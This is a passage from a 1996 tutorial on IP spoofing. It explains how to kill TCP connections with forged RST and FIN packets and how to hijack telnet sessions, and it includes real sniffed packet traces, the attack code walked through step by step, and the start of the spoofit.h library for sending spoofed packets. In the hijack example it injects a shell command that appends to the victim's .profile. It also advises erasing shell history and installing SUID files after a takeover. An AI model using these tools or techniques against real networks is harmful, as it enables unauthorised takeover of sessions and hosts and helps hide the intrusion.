(S on same subnet as A) (This is a good example of how things not always go as you want, see below for a solution) 1) connection running... we wait for a packet to get current SEQ/ACK (A->B) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23 SEQ (hex): 57E1F2A6 ACK (hex): B8BD7679 FLAGS: -AP--- Window: 3400 (data removed because irrelevant, 2 bytes data) 2) This is the ACK of it + included data (witch causes SEQ number to change, and thus messing up our scheme, because this came very fast.) (B->A) TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810 SEQ (hex): B8BD7679 ACK (hex): 57E1F2A8 FLAGS: -AP--- Window: 2238 (data removed because irrelevant, 2 bytes data) 3) ACK of it. (A->B) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23 SEQ (hex): 57E1F2A8 ACK (hex): B8BD767B FLAGS: -A---- Window: 3400 (data removed because irrelevant) 4) further data (B->A) TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810 SEQ (hex): B8BD767B ACK (hex): 57E1F2A8 FLAGS: -AP--- Window: 2238 (data removed because irrelevant) 5) ACK of it (A->B) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23 SEQ (hex): 57E1F2A8 ACK (hex): B8BD7691 FLAGS: -A---- Window: 3400 6) Now we get 2 RST packets. How do you explain that? Well, the first reset packet has been buffered somewhere on our system, because the ethernet segment was busy when we wanted to send it. This is the 'unexpected thing' I discussed above, here we are lucky, the data stream cooled down so fast. When it doesn't cool down so fast, we could miss our RST (or the connection will be killed a little later then when we wanted), you'll see some idea's on how to fix that problem. TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810 SEQ (hex): B8BD7679 FLAGS: ---R-- TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810 SEQ (hex): B8BD7691 FLAGS: ---R-- (This was the packet that killed the connection) Discussion of the program: The discussion here is a bit weird , that is because 'sniper-rst.c' is not designed to be an optimal killer, merly to be an example. We have the problem of speed here. We miss some packets what causes those resends. So we would design a better 'sniper' if we do the following: - use blocking IO (not necessarilly, because the RST killer would loose some of it's beauty (looping), this is dealt with in the FIN killer example. Blocking is a little faster when a lot of packets come after each other.) - multi-packet firing... fire more packets with incremented SEQ. (this is commented in the source) - waiting for a pure ACK packet (no data), because otherwise you risk to much of getting mid transmission and not being fast enough. (disadvantage is the 'waiting period' before the connection is killed) NOTE these examples were done on non-loaded networks, with non-loaded servers, what makes it a worst case scenario for speed problems. 4.3.2 Closing a connection (FIN) -------------------------------- Concept: An other flag is FIN and says: "no more data from sender". This flag is used when closing a connection down the normal legit way. So if there was a way to make a packet that is accepted by one of the two hosts, this host would believe the 'sender' didn't have any data left. Following (real) packets would be ignored as they are considered bogus. That's it, because we can sniff the current SEQ/ACK of the connection we can pretend to be either host A or B, and provide the other host with CORRECT packetinformation, and an evil FIN flag. The beauty of it all is, that after a FIN is send the other host always replies with one if it is accepted, so we have a way to verify our killing, and can be 100% sure of success (if for some reason we missed a SEQ or ACK, we can just resend). RST killing is more popular and is prefered, but I've put this in as an example, and I like it myself. An actual attack: (These are real sniffed packets, although IP numbers of hosts were changed) host A : 166.66.66.1 host B : 111.11.11.11 (S on same subnet as A) 1) connection is running.... sniper is started on host S as 'sniper-fin 166.66.66.1 23 111.11.11.11 1072' and waits for a packet to take action (we need to get SEQ/ACK) (mind you switching host A and B would be the same, only S would be impersonating A instead of B) suddenly a packet arrives... (A->B) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072 SEQ (hex): 19C6B98B ACK (hex): 69C5473E FLAGS: -AP--- Window: 3400 Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072 45 E 00 . 00 . 2A * 30 0 5E ^ 40 @ 00 . 40 @ 06 . 5E ^ AD . 9D . C1 . 45 E 33 3 9D . C1 . 2B + 0D . 00 . 17 . 04 . 30 0 19 . C6 . B9 . 8B . 69 i C5 . 47 G 3E > 50 P 18 . 34 4 00 . 3A : 61 a 00 . 00 . 0D . 0A . ~~~~~~~~~ > 2 data bytes 2) sniper detected it, and sends a bogus packet. (S as B -> A) We calculate our SEQ as: ACK of (A->B) packet We calculate our ACK as: SEQ of (A->B) packet + datalength of that packet (19C6B98B + 2 = 19C6B98D) (so we tell A, we received the last packet, and will not transmit further data) TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.1072-166.66.66.1.23 SEQ (hex): 69C5473E ACK (hex): 19C6B98D FLAGS: -A---F Window: 7C00 (data removed because irrelevant) 3) host A now says: 'okay, you end the session, so here is my last data' (A->B) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072 SEQ (hex): 19C6B98D ACK (hex): 69C5473E FLAGS: -AP--- Window: 3400 (data removed because irrelevant) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072 SEQ (hex): 19C6B998 ACK (hex): 69C5473F FLAGS: -A---- Window: 3400 (data removed because irrelevant) 4) host A now has flushed its buffer and on his turn FIN's the connection. (A->B) sniper, intercepts this packet and now knows the hosts fell for the spoof and the killing was a success! (host A will no longer accept any data) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072 SEQ (hex): 19C6B998 ACK (hex): 69C5473F FLAGS: -A---F Window: 3400 (data removed because irrelevant) 5) We impersonated B, making A believe we had no further data. But B doesn't know that and continues to send packets. (B->A) host A has that connection closed, and thus thinks the real packets of B are spoofed (or at least bogus)! So host A sends some reset packets (RST). TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.1072-166.66.66.1.23 SEQ (hex): 69C5473E ACK (hex): 19C6B98D FLAGS: -A---- Window: 3750 (data removed because irrelevant) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072 SEQ (hex): 19C6B98D FLAGS: ---R-- (data removed because irrelevant) 6) This goes on for a couple of packets. Discussion of the program (numbers correspond with those of 'An Actual Attack'): 1) stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,10); if(stat==-1) {printf("Connection 10 secs idle... timeout.\n");exit(1);} We use wait_packet on a non blocking socket. This way we can enable a 10 seconds timeout. This functions returns when the correct packet has been delivered (or timeout). 2) sp_seq=pinfo.ack; sp_ack=pinfo.seq+pinfo.datalen; transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P, sp_seq,sp_ack,ACK|FIN); We calculate a spoofed SEQ/ACK, and fire off a fake FIN packet. As we don't send any data with it, our buffer is set to NULL and datalength to 0. NOTE together with FIN, you need to enable ACK. 3) N/A 4) stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,FIN,5); if(stat>=0) {printf("Killed the connection...\n"); exit(0);} We wait for a FIN packet (note the FIN in wait_packet). We use a 5 sec. timeout, if the function returns and stat>=0 (-1 on timeout), we know our attempt was successfull. 5) N/A 6) N/A NOTE We can have the same problem here as with the RST killer. But didn't have it here, because the packet we responded upon was the end of a data stream (in fact it was an echo from a shell command) 4.3.3 Improving --------------- Except from multipacket firing, it is advised to launch 2 attacks (one in both ways). This illiminates one side oriented connections to be handled optimally. I think of things like downloading data, which is a one way data-flow, it is much easier sending a RST from the (spoofed) receiver to the sender, then the other way around. Those 2 attacks could both impersonate host A and B, and thus giving is 4 times more chance of a succesfull kill. I'll leave further experimenting up to you (use your imagination to handle different situations). 4.4 Connection Hijacking ------------------------ Setup: host A <------X------------------------->host B | A,B have a TCP connection running (TELNET) host S <------/ A,S on same subnet Concept: (suppose a TELNET from A (client) to B (server)) TCP separates good and bogus packets by their SEQ/ACK numbers i.e. B trusts the packets from A because of its correct SEQ/ACK numbers. So if there was a way to mess up A's SEQ/ACK, B would stop believing A's real packets. We could then impersonate to be A, but using correct SEQ/ACK numbers (that is numbers correct for B). We would now have taken over the connection (host A is confused, B thinks nothings wrong (almost correct, see 'actual attack'), and S sends 'correct' data to B). This is called 'Hijacking' a connection. (generally hijacking a TELNET session, but same could be done woth FTP, RLOGIN, etc...) How could we mess up A's SEQ/ACK numbers? Well by simply inserting a data packet into the stream at the right time (S as A->B), the server B would accept this data, and update ACK numbers, A would continue to send it's old SEQ numbers, as it's unaware of our spoofed data. Use: I allready hear you wiseguys yelling: "Hey dude, why hijack a connection if you can sniff those packets anyway??" Well, anybody heared of One Time Passwords, Secure Key?? Case closed.... (S/Key: server challenges client, client and server calculate a code from the challenge and password, and compare that code. The password itself is never send on the cable, so you can't sniff sh!t). (OTP: server has a list of passwords, once one is used, it is destroyed, so sniffing gets you a password that has 'just' expired ;) (ALL types of identification that happen at connection (encrypted or not, trusted or not), and don't use encrypted data transfer, are vulnerable to 'hijacking'.) An actual attack: (These are real sniffed packets, although IP numbers of hosts were changed) (suppose a TELNET from A (client) to B (server)) host A : 166.66.66.1 host B : 111.11.11.11 (S on same subnet as A) 1) connection running... we look with sniffit, and see he's busy in a shell, we start 'hijack' on host S as 'hijack 166.66.66.1 2035 111.11.11.11' a packet containing from (A->B) is detected... hijack takes action... (A->B) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 SEQ (hex): 5C8223EA ACK (hex): C34A67F6 FLAGS: -AP--- Window: 7C00 Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 45 E 00 . 00 . 29 ) CA . F3 . 40 @ 00 . 40 @ 06 . C5 . 0E . 9D . C1 . 45 E 3F ? 9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # EA . C3 . 4A J 67 g F6 . 50 P 18 . 7C | 00 . 6D m 29 ) 00 . 00 . 6C l ~~~~ 2) host B (server) echo's that databyte (typing 'l' in a bash shell!!!) (you gotta know what you are doing) (B->A) TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 SEQ (hex): C34A67F6 ACK (hex): 5C8223EB FLAGS: -AP--- Window: 2238 Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 45 E 00 . 00 . 29 ) B5 . BD . 40 @ 00 . FC . 06 . 1E . 44 D 9D . C1 . 2A * 0B . 9D . C1 . 45 E 3F ? 00 . 17 . 04 . 10 . C3 . 4A J 67 g F6 . 5C \ 82 . 23 # EB . 50 P 18 . 22 " 38 8 C6 . F0 . 00 . 00 . 6C l ~~~~ 3) A simple ACK from host A to B responding to that echo. Because we know this can come, and we know a simple ACK doesn't contain data, we don't need this for SEQ/ACK calculation. TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 SEQ (hex): 5C8223EB ACK (hex): C34A67F7 FLAGS: -A---- Window: 7C00 (data removed because irrelevant) 4) Now we impersonate further data (following packet 1). (S as A -> B) We calculate SEQ/ACK out of packet 1, NOT out of the 'echo' from B, because we have to be as fast as possible, and packet 2 could be slow. We send some backspaces and some enters. To clean up the command line. We will probably still get some error message back from the shell. But we handle that too! (see sourcecode) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 SEQ (hex): 5C8223EB ACK (hex): C34A67F6 FLAGS: -AP--- Window: 7C00 Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 45 E 00 . 00 . 32 2 31 1 01 . 00 . 00 . 45 E 06 . 99 . F8 . 9D . C1 . 45 E 3F ? 9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # EB . C3 . 4A J 67 g F6 . 50 P 18 . 7C | 00 . AE . F5 . 00 . 00 . 08 . 08 . 08 . 08 . 08 . 08 . 08 . 08 . 0A . 0A . 5) This is the echo of our spoofed data. Look at ACK. (B->A) 5C8223F5 = 5C8223EB + 0A (this is how we detect that the spoof was a success) NOTE that at this point the connection is ours, and A's SEQ/ACK numbers are completely f#cked up according to B. TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 SEQ (hex): C34A67F7 ACK (hex): 5C8223F5 FLAGS: -AP--- Window: 2238 Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 45 E 00 . 00 . 3C < B5 . BE . 40 @ 00 . FC . 06 . 1E . 30 0 9D . C1 . 2A * 0B . 9D . C1 . 45 E 3F ? 00 . 17 . 04 . 10 . C3 . 4A J 67 g F7 . 5C \ 82 . 23 # F5 . 50 P 18 . 22 " 38 8 26 & 7C | 00 . 00 . 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 0D . 0A . 0D . 0A . 6) Hijack will now try to get on track of SEQ/ACK numbers again, to send the data we want to be executed. NOTE each time a packet 'out of numbering' arrives the host should answer with correct SEQ/ACK, this provides us with the certainty that a lot of packets are going to be send with correct (and not changing) SEQ/ACK nrs. (this is where the mechanism of getting our numbers back straight is based upon) NOTE it's at this point the real TELNET client's session hangs, most people ignore this and re-login after a few secs, accepting the accident as Murphy's law. (Well it *can* happen without any spoofing involved) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 SEQ (hex): 5C8223EB ACK (hex): C34A67F7 FLAGS: -AP--- Window: 7C00 (data removed because irrelevant) TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 SEQ (hex): C34A680B ACK (hex): 5C8223F5 FLAGS: -A---- Window: 2238 (data removed because irrelevant) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-157.193.42.11.23 SEQ (hex): 5C8223EB ACK (hex): C34A67F7 FLAGS: -AP--- Window: 7C00 (data removed because irrelevant) TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 SEQ (hex): C34A680B ACK (hex): 5C8223F5 FLAGS: -A---- Window: 2238 (data removed because irrelevant) 7) We are back on track (or at least hijack is, because this is going very fast). And we fire off our faked bash command. echo "echo HACKED" >> $HOME/.profile TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 SEQ (hex): 5C8223F5 ACK (hex): C34A680B FLAGS: -AP--- Window: 7C00 Packet ID (from_IP.port-to_IP.port): 166.66.66.1-111.11.11.11.23 45 E 00 . 00 . 4D M 31 1 01 . 00 . 00 . 45 E 06 . 99 . DD . 9D . C1 . 45 E 3F ? 9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # F5 . C3 . 4A J 68 h 0B . 50 P 18 . 7C | 00 . 5A Z B6 . 00 . 00 . 65 e 63 c 68 h 6F o 20 22 " 65 e 63 c 68 h 6F o 20 48 H 41 A 43 C 4B K 45 E 44 D 22 " 20 3E > 3E > 24 $ 48 H 4F O 4D M 45 E 2F / 2E . 70 p 72 r 6F o 66 f 69 i 6C l 65 e 0A . 00 . 8) now we wait for this data to be confirmed. ACK = 5C8223F5 + 025 (=37 bytes) TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 SEQ (hex): C34A680B ACK (hex): 5C82241A FLAGS: -AP--- Window: 2238 Packet ID (from_IP.port-to_IP.port): 157.193.42.11.23-157.193.69.63.1040 (data removed because irrelevant) 9) The connection runs on. Now you can execute more commands (just stay on track of SEQ/ACK), and even finnish the connection (with the same mechanism of sniper, or with sniper itself... here FIN is recommended). NOTE: here it is important to be in a shell. But if you have been watching someone, and you notice he's always directly going to 'pine' and you can't get inbetween on time. NO PROBS.... just make a cleanup string that cleans up 'pine' and puts you back in the shell. (some control chars, hotkeys, whatever....) NOTE: if you clean up the .sh_history of .bash_history (whatever) this attack is one of the nicest there is. Another advantage above sniffing. NOTE: Noone says you have to make a .rhosts file (rlogin and family might be disabled), you can change permissions, put stuff SUID, put it public, install stuff, mail, etc.. Discussion of the program (numbers correspond with those of 'An Actual Attack'): 1) wait_packet(fd_receive,&attack_info,CLIENT, CLIENT_P, SERVER, 23,ACK|PSH,0); Waiting for actual data (PSH is always used for packets containing data in interactive services like TELNET) 2) N/A 3) N/A 4) sp_seq=attack_info.seq+attack_info.datalen; sp_ack=attack_info.ack; transmit_TCP(fd_send, to_data,0,0,sizeof(to_data),CLIENT, CLIENT_P, SERVER, 23,sp_seq,sp_ack,ACK|PSH); We recalculate the sequence number (using SEQ and datalength of packet 1) an we send a spoofed packet with ACK and PSH flag, containing the cleanup data in to_data. 5) while(count<5) { wait_packet(fd_receive, &attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0); if(attack_info.ack==sp_seq+sizeof(to_data)) count=PERSONAL_TOUCH; else count++; }; We wait for a confirmation that our spoofed sequence is accepted. We expect a packet with an ACK set (PSH or not). It should come within 5 packets, we use this limit, because we should be able to handle some previous ACK packets! NOTE we don't check SEQ nrs, because we have no clue of what they are going to be (data might have been send our way, or not). 6) while(count<10) { old_seq=serv_seq; old_ack=serv_ack; wait_packet(fd_receive,&attack_info,SERVER, 23, CLIENT, CLIENT_P, ACK,0); if(attack_info.datalen==0) { serv_seq=attack_info.seq+attack_info.datalen; serv_ack=attack_info.ack; if( (old_seq==serv_seq)&&(serv_ack==old_ack) ) count=PERSONAL_TOUCH; else count++; } }; To get back on track, we try to receive 2 ACK packets without data with the same SEQ/ACK. We know enough packets will be send as a response to incorrect packets from the confused host A. This is how we get back on track. NOTE In a case where A completely gave up, simple spoof a packet with incorrect SEQ/ACK to get the correct numbers back. 7) transmit_TCP(fd_send, evil_data,0,0,sizeof(evil_data),CLIENT,CLIENT_P, SERVER,23,serv_ack,serv_seq,ACK|PSH); Pretty clear.... 8) while(count<5) { wait_packet(fd_receive,&attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0); if(attack_info.ack==serv_ack+sizeof(evil_data)) count=PERSONAL_TOUCH; else count++; }; and again waiting for confirmation. NOTE after the above attack, hijack had produced the following output: Starting Hijacking demo - Brecht Claerhout 1996 ----------------------------------------------- Takeover phase 1: Stealing connection. Sending Spoofed clean-up data... Waiting for spoof to be confirmed... Phase 1 ended. Takeover phase 2: Getting on track with SEQ/ACK's again Server SEQ: C34A680B (hex) ACK: 5C8223F5 (hex) Phase 2 ended. Takeover phase 3: Sending MY data. Sending evil data. Waiting for evil data to be confirmed... Phase 3 ended. 4.5 Other --------- This list is far from complete, I'm sure you can think of other nice things to do with this information, think, experiment and code! 5. The source code ------------------ ---=[ spoofit.h ]=------------------------------------------------------------ /**************************************************************************/ /* Spoofit.h - Include file for easy creating of spoofed TCP packets */ /* Requires LINUX 1.3.x (or later) Kernel */ /* (illustration for 'A short overview of IP spoofing') */ /* V.1 - Copyright 1996 - Brecht Claerhout */ /* */ /* Purpose - Providing skilled people with a easy to use spoofing source */ /* I used it to be able to write my tools fast and short. */ /* Mind you this is only illustrative and can be easily */ /* optimised. */ /* */ /* Author - Brecht Claerhout */ /* Serious advice, comments, statements, greets, always welcome */ /* flames, moronic 3l33t >/dev/null */ /* */ /* Disclaimer - This file is for educational purposes only. I am in */ /* NO way responsible for what you do with this file, */ /* or any damage you or this file causes. */ /* */ /* For whom - People with a little knowledge of TCP/IP, C source code */ /* and general UNIX. Otherwise, please keep your hands of, */ /* and catch up on those things first. */ /* */ /* Limited to - Linux 1.3.X or higher. */ /* If you know a little about your OS, shouldn't be to hard */ /* to port. */ /* */ /* Important note - You might have noticed I use non standard packet */ /* header struct's. How come?? Because I started like */ /* that on Sniffit because I wanted to do the */ /* bittransforms myself. */ /* Well I got so damned used to them, I keep using them, */ /* they are not very different, and not hard to use, so */ /* you'll easily use my struct's without any problem, */ /* this code and the examples show how to use them. */ /* my apologies for this inconvenience. */ /* */ /* None of this code can be used in commercial software. You are free to */ /* use it in any other non-commercial software (modified or not) as long */ /* as you give me the credits for it. You can spread this include file, */ /* but keep it unmodified. */ /* */ /**************************************************************************/ /* */ /* Easiest way to understand this library is to look at the use of it, in */ /* the example progs. */ /* */ /**** Sending packets *****************************************************/ /* */ /* int open_sending (void) */ /* Returns a filedescriptor to the sending socket. */ /* close it with close (int filedesc) */ /* */ /* void transmit_TCP (int sp_fd, char *sp_data, */ /* int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen, */ /* char *sp_source, unsigned short sp_source_port, */ /* char *sp_dest,unsigned short sp_dest_port, */ /* unsigned long sp_seq, unsigned long sp_ack, */ /* unsigned short sp_flags) */ /* fire data away in a TCP packet */ /* sp_fd : raw socket filedesc. */ /* sp_data : IP options (you should do the padding) */ /* TCP options (you should do the padding) */ /* data to be transmitted */ /* (NULL is nothing) */ /* note that all is optional, and IP en TCP options are*/ /* not often used. */ /* All data is put after eachother in one buffer. */ /* sp_ipoptlen : length of IP options (in bytes) */ /* sp_tcpoptlen : length of TCP options (in bytes) */ /* sp_datalen : amount of data to be transmitted (bytes) */ /* sp_source : spoofed host that"sends packet" */ /* sp_source_port: spoofed port that "sends packet" */ /* sp_dest : host that should receive packet */ /* sp_dest_port : port that should receive packet */ /* sp_seq : sequence number of packet */ /* sp_ack : ACK of packet */ /* sp_flags : flags of packet (URG,ACK,PSH,RST,SYN,FIN) */ /* */ /* void transmit_UDP (int sp_fd, char *sp_data, */ /* int sp_ipoptlen, int sp_datalen, */ /* char *sp_source, unsigned short sp_source_port, */ /* char *sp_dest, unsigned short sp_dest_port) */ /* fire data away in an UDP packet */ /* sp_fd : raw socket filedesc. */ /* sp_data : IP options */ /* data to be transmitted */ /* (NULL if none) */ /* sp_ipoptlen : length of IP options (in bytes) */ /* sp_datalen : amount of data to be transmitted */ /* sp_source : spoofed host that"sends packet" */ /* sp_source_port: spoofed port that "sends packet" */ /* sp_dest : host that should receive packet */ /* sp_dest_port : port that should receive packet */ /* */ /**** Receiving packets ***************************************************/ /* */ /* int open_receiving (char *rc_device, char mode) */ /* Returns fdesc to a receiving socket */ /* (if mode: IO_HANDLE don't call this twice, global var */ /* rc_fd_abc123 is initialised) */ /* rc_device: the device to use e.g. "eth0", "ppp0" */ /* be sure to change DEV_PREFIX accordingly! */ /* DEV_PREFIX is the length in bytes of the header that */ /* comes with a SOCKET_PACKET due to the network device */ /* mode: 0: normal mode, blocking, (read will wait till packet */ /* comes, mind you, we are in PROMISC mode) */ /* IO_NONBLOCK: non-blocking mode (read will not wait till */ /* usefull for active polling) */ /* IO_HANDLE installs the signal handler that updates SEQ,ACK,..*/ /* (IO_HANDLE is not recommended to use, as it should be */ /* modified according to own use, and it works bad on heavy */ /* traffic continuous monitoring. I needed it once, but left it */ /* in to make you able to have a look at Signal handled IO, */ /* personally I would have removed it, but some thought it */ /* doesn't do any harm anyway, so why remove... ) */ /* (I'm not giving any more info on IO_HANDLE as it is not */ /* needed for the example programs, and interested people can */ /* easilythey figure the code out theirselves.) */ /* (Besides IO_HANDLE can only be called ONCE in a program, */ /* other modes multiple times) */ /* */ /* int get_packet (int rc_fd, char *buffer, int *TCP_UDP_start, */ /* unsigned char *proto) */ /* This waits for a packet (mode default) and puts it in buffer or */ /* returns whether there is a pack or not (IO_NONBLOCK). */ /* It returns the packet length if there is one available, else 0 */ /* */ /* int wait_packet(int wp_fd,struct sp_wait_packet *ret_values, */ /* char *wp_source, unsigned short wp_source_port, */ /* char *wp_dest, unsigned short wp_dest_port, */ /* int wp_flags, int wait_time); */ /* wp_fd: a receiving socket (default or IO_NONBLOCK) */ /* ret_values: pointer to a sp_wait_packet struct, that contains SEQ, */ /* ACK, flags, datalen of that packet. For further packet */ /* handling see the examples. */ /* struct sp_wait_packet { */ /* unsigned long seq,ack; */ /* unsigned short flags; */ /* int datalen; */ /* }; */ /* wp_source, wp_source_port : sender of packet */ /* wp_dest, wp_dest_port : receiver of packet */ /* wp_flags: flags that should be present in packet.. (mind you there */ /* could be more present, so check on return) */ /* note: if you don't care about flag, use 0 */ /* wait_time: if not zero, this function will return -1 if no correct */ /* packet has arrived within wait_time secs. */ /* (only works on IO_NONBLOCK socket) */ /* */ /* void set_filter (char *f_source, unsigned short f_source_port, */ /* char *f_dest, unsigned short f_dest_port) */ /* (for use with IO_HANDLE) */ /* Start the program to watch all trafic from source/port to */ /* dest/port. This enables the updating of global data. Can */ /* be called multiple times. */ /* */ /* void close_receiving (void) */ /* When opened a IO_HANDLE mode receiving socket close it with */ /* this. */ /* */ /**** Global DATA (IO_HANDLE mode) ****************************************/ /* */ /* When accessing global data, copy the values to local vars and then use */ /* them. Reduce access time to a minimum. */ /* Mind you use of this is very limited, if you are a novice on IO, just */ /* ignore it, the other functions are good enough!). If not, rewrite the */ /* handler for your own use... */ /* */ /* sig_atomic_t SP_DATA_BUSY */ /* Put this on NON-ZERO when accesing global data. Incoming */ /* packets will be ignored then, data can not be overwritten. */ /* */ /* unsigned long int CUR_SEQ, CUR_ACK; */ /* Last recorded SEQ and ACK number of the filtered "stream". */ /* Before accessing this data set SP_DATA_BUSY non-zero, */ /* afterward set it back to zero. */ /* */ /* unsigned long int CUR_COUNT; */ /* increased everytime other data is updated */ /* */ /* unsigned int CUR_DATALEN; */ /* Length of date in last TCP packet */ /* */ /**************************************************************************/ #include "sys/socket.h" /* includes, what would we do without them */ #include "netdb.h" #include "stdlib.h" #include "unistd.h" #include "stdio.h" #include "errno.h" #include "netinet/in.h" #include "netinet/ip.h" #include "linux/if.h" #include "sys/ioctl.h" #include "sys/types.h" #include "signal.h" #include "fcntl.h" #undef DEBUG #define IP_VERSION 4 /* keep y'r hands off... */ #define MTU 1500 #define IP_HEAD_BASE 20 /* using fixed lengths to send */ #define TCP_HEAD_BASE 20 /* no options etc... */ #define UDP_HEAD_BASE 8 /* Always fixed */ #define IO_HANDLE 1 #define IO_NONBLOCK 2 int DEV_PREFIX = 9999; sig_atomic_t WAIT_PACKET_WAIT_TIME=0; /**** IO_HANDLE ************************************************************/ int rc_fd_abc123; sig_atomic_t RC_FILTSET=0; char rc_filter_string[50]; /* x.x.x.x.p-y.y.y.y.g */ sig_atomic_t SP_DATA_BUSY=0; unsigned long int CUR_SEQ=0, CUR_ACK=0, CUR_COUNT=0; unsigned int CUR_DATALEN; unsigned short CUR_FLAGS; /***************************************************************************/ struct sp_wait_packet { unsigned long seq,ack; unsigned short flags; int datalen; }; /* Code from Sniffit - BTW my own program.... no copyright violation here */ #define URG 32 /* TCP flags */ #define ACK 16 #define PSH 8 #define RST 4 #define SYN 2 #define FIN 1 struct PACKET_info { int len, datalen; unsigned long int seq_nr, ACK_nr; u_char FLAGS; }; struct IP_header /* The IPheader (without options) */ { unsigned char verlen, type; unsigned short length, ID, flag_offset; unsigned char TTL, protocol; unsigned short checksum; unsigned long int source, destination; }; struct TCP_header /* The TCP header (without options) */ { unsigned short source, destination; unsigned long int seq_nr, ACK_nr; unsigned short offset_flag, window, checksum, urgent; }; struct UDP_header /* The UDP header */ { unsigned short source, destination; unsigned short length, checksum; }; struct pseudo_IP_header /* The pseudo IP header (checksum calc) */ { unsigned long int source, destination; char zero_byte, protocol; unsigned short TCP_UDP_len; }; /* data structure for argument passing */ struct sp_data_exchange { int fd; /* Sh!t from transmit_TCP */ char *data; int datalen; char *source; unsigned short source_port; char *dest; unsigned short dest_port; unsigned long seq, ack; unsigned short flags; char *buffer; /* work buffer */ int IP_optlen; /* IP options length in bytes */ int TCP_optlen; /* TCP options length in bytes */ }; /**************** all functions *******************************************/ void transmit_TCP (int fd, char *sp_data, int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen, char *sp_source, unsigned short sp_source_port, char *sp_dest, unsigned short sp_dest_port, unsigned long sp_seq, unsigned long sp_ack, unsigned short sp_flags); void transmit_UDP (int sp_fd, char *sp_data, int ipoptlen, int sp_datalen, char *sp_source, unsigned short sp_source_port, char *sp_dest, unsigned short sp_dest_port); int get_packet (int rc_fd, char *buffer, int *, unsigned char*); int wait_packet(int,struct sp_wait_packet *,char *, unsigned short,char *, unsigned short, int, int); static unsigned long sp_getaddrbyname(char *); int open_sending (void); int open_receiving (char *, char); void close_receiving (void); void sp_send_packet (struct sp_data_exchange *, unsigned char); void sp_fix_TCP_packet (struct sp_data_exchange *); void sp_fix_UDP_packet (struct sp_data_exchange *); void sp_fix_IP_packet (struct sp_data_exchange *, unsigned char); unsigned short in_cksum(unsigned short *, int ); void rc_sigio (int); void set_filter (char *, unsigned short, char *, unsigned short); /********************* let the games commence ****************************/ static unsigned long sp_getaddrbyname(char *sp_name) { struct hostent *sp_he; int i; if(isdigit(*sp_name)) return inet_addr(sp_name); for(i=0;i<100;i++) { if(!(sp_he = gethostbyname(sp_name))) {printf("WARNING: gethostbyname failure!\n"); sleep(1); if(i>=3) /* always a retry here in this kind of application */ printf("Coudn't resolv hostname."), exit(1); } else break; } return sp_he ? *(long*)*sp_he->h_addr_list : 0; } int open_sending (void) { struct protoent *sp_proto; int sp_fd; int dummy=1; /* they don't come rawer */ if ((sp_fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))==-1) perror("Couldn't open Socket."), exit(1); #ifdef DEBUG printf("Raw socket ready\n"); #endif return sp_fd; } void sp_send_packet (struct sp_data_exchange *sp, unsigned char proto) { int sp_status; struct sockaddr_in sp_server; struct hostent *sp_help; int HEAD_BASE; /* Construction of destination */ bzero((char *)&sp_server, sizeof(struct sockaddr)); sp_server.sin_family = AF_INET; sp_server.sin_addr.s_addr = inet_addr(sp->dest); if (sp_server.sin_addr.s_addr == (unsigned int)-1) { /* if target not in DOT/number notation */ if (!(sp_help=gethostbyname(sp->dest))) fprintf(stderr,"unknown host %s\n", sp->dest), exit(1); bcopy(sp_help->h_addr, (caddr_t)&sp_server.sin_addr, sp_help->h_length); }; switch(proto) { case 6: HEAD_BASE = TCP_HEAD_BASE; break; /* TCP */ case 17: HEAD_BASE = UDP_HEAD_BASE; 